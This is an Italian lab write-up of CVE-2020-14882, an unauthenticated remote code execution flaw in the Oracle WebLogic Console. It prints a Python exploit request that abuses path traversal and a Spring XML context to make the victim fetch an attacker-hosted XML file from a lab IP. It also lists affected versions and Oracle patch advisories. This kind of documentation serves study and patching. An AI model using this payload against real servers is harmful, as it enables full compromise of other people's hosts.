
Compromissione di Oracle WebLogic Server
CVE-2020-14882 è una falla di esecuzione remota di codice (RCE) nel componente Console di Oracle WebLogic Server. Alla falla pre-autenticazione è stata assegnata una complessità di attacco "bassa" ed è stata evidenziata come "facilmente sfruttabile" da Oracle, con conseguente assegnazione di un punteggio CVSSv3 critico di 9.8. Lo sfruttamento riuscito consentirebbe a un attaccante non autenticato di compromettere il server Oracle WebLogic tramite HTTP e di assumere il controllo completo dell'host. (Ulteriori informazioni - Tenable)
Le versioni supportate interessate sono 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 e 14.1.1.0.0.
Vittima (WebLogic Server): 192.168.0.15 - Windows 10 PRO con WebLogic Server in esecuzione.
Attaccante (file XML ospitato): 192.168.0.16 - Kali Linux - GNU/Linux - Debian.
Payload:
import requests
url = http://{}:{}/console/images/%252E%252E%252Fconsole.portal' \
'?_nfpb=true&_pageLabel=HomePage1&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext' \
'(%22http://192.168.0.16:8000/Documents/teste.xml%22)'.format('192.168.0.15', '7001')
response = requests.get(url)
Questo payload chiamerà una libreria XML del framework Spring per inviare una richiesta a un server nel dominio dell'attaccante cercando il file teste.xml.
Il 28 ottobre, il ricercatore di sicurezza di nome Jang ha pubblicato un post sul blog (in vietnamita) su CVE-2020-14882, includendo dettagli parziali che potevano essere utilizzati per un PoC. Jang non è nuovo alle vulnerabilità di WebLogic, essendo accreditato per aver scoperto e segnalato CVE-2020-2555 a Oracle, che ha corretto la vulnerabilità nel suo CPU di gennaio 2020. A marzo, Jang ha confermato che CVE-2020-2555 non era stato completamente corretto. Il bypass per CVE-2020-2555 è stato divulgato da un altro ricercatore, Quynh Le del VNPT Information Security Center (ISC). Sia Le che Jang sono accreditati per aver segnalato questo bypass, identificato come CVE-2020-2883. (Ulteriori informazioni - Tenable)
Oracle WebLogic: CVE-2020-14882 : Critical Patch Update (Doc ID 2771503.1). (Supporto Oracle)
Avviso Oracle Critical Patch Update - Ottobre 2020. (Supporto Oracle)
Come mitigare l'impatto di CVE-2020-14882 WebLogic. (Supporto Oracle)
Vulnerabilità nel prodotto Oracle WebLogic Server di Oracle Fusion Middleware. (Mitre - CVE)